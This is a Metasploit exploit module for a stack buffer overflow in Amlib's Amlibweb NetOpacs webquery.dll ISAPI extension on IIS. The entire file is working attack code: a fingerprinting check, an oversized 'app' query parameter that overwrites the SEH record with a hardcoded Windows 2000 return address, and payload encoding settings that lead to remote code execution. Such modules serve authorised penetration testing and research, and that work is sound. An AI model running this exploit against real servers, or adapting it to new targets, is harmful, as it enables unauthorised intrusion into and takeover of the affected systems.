##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
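class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Request path of the vulnerable ISAPI extension, as served by IIS.
  WEBQUERY_PATH = '/amlibweb/webquery.dll'.freeze

  # Error page the server returns for a query it cannot parse. The capture
  # group holds the parameter name that was sent, which is what +check+
  # compares against its random marker.
  BAD_REQUEST_RE = /<H1>BAD REQUEST<\/H1><P>Your client sent a request that this server didn't understand.<br>Request:\s(\w+)/

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Amlibweb NetOpacs webquery.dll Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Amlib's Amlibweb
          Library Management System (NetOpacs). The webquery.dll
          API is available through IIS requests. By specifying
          an overly long string to the 'app' parameter, SeH can be
          reliably overwritten allowing for arbitrary remote code execution.
          In addition, it is possible to overwrite EIP by specifying
          an arbitrary parameter name with an '=' terminator.
        },
        'Author' => [ 'aushack' ],
        'Arch' => [ ARCH_X86 ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'OSVDB', '66814' ],
          [ 'BID', '42293' ],
          [ 'URL', 'http://www.aushack.com/advisories/' ],
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
          'AllowWin32SEH' => true
        },
        'Payload' => {
          # 'Space' => 600,
          # The payload travels inside a URL query string; NUL, CR/LF, space
          # and the URL-significant punctuation below are excluded, presumably
          # because they would terminate or alter the query (not verified here).
          'BadChars' => "\x00\x0a\x0d\x20%=?\x2f\x5c\x3a\x3d\@;!$",
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
          'DisableNops' => true,
          'StackAdjustment' => -3500,
        },
        'Platform' => ['win'],
        'Targets' => [
          # aushack - Tested OK 20100803 w2k IIS5
          [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS5
          # [ 'Windows 2003 Server All - English', { 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only.
        ],
        'DisclosureDate' => '2010-08-03', # 0day
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(80),
      ]
    )
  end

  # Fingerprints the target without triggering the overflow: a random
  # parameter name followed by an '=' terminator is sent, and the response is
  # inspected for that name being echoed in the server's BAD REQUEST page.
  #
  # Connection failures are reported as Unknown instead of propagating, and
  # the socket is always released, including on the error path.
  #
  # @return [Msf::Exploit::CheckCode] Vulnerable when the marker is echoed,
  #   Safe when the response does not match, Unknown when the connection fails.
  def check
    # Named +marker+ rather than +rand+ so the local does not shadow Kernel#rand.
    marker = Rex::Text.rand_text_alpha(10)

    begin
      connect
      sock.put("GET #{WEBQUERY_PATH}?#{marker}= HTTP/1.0\r\n\r\n")
      res = sock.get_once
    rescue ::Rex::ConnectionError => e
      vprint_error("Connection failed: #{e.message}")
      return Exploit::CheckCode::Unknown
    ensure
      disconnect
    end

    # get_once may return nil; to_s turns that into an empty, non-matching string.
    match = BAD_REQUEST_RE.match(res.to_s)
    return Exploit::CheckCode::Vulnerable if match && match[1] == marker

    Exploit::CheckCode::Safe
  end

  # Sends the oversized 'app' value: random filler followed by the SEH record
  # built for the selected target's return address, then hands off to the
  # payload handler. The bytes on the wire are identical to the original
  # module's request.
  def exploit
    connect

    seh = generate_seh_payload(target.ret)
    # 3028 bytes of alphanumeric filler precede the SEH record.
    buffer = Rex::Text.rand_text_alphanumeric(3028) + seh
    request = "GET #{WEBQUERY_PATH}?app=#{buffer} HTTP/1.0\r\n"
    sock.put("#{request}\r\n\r\n")

    handler
    disconnect
  end
end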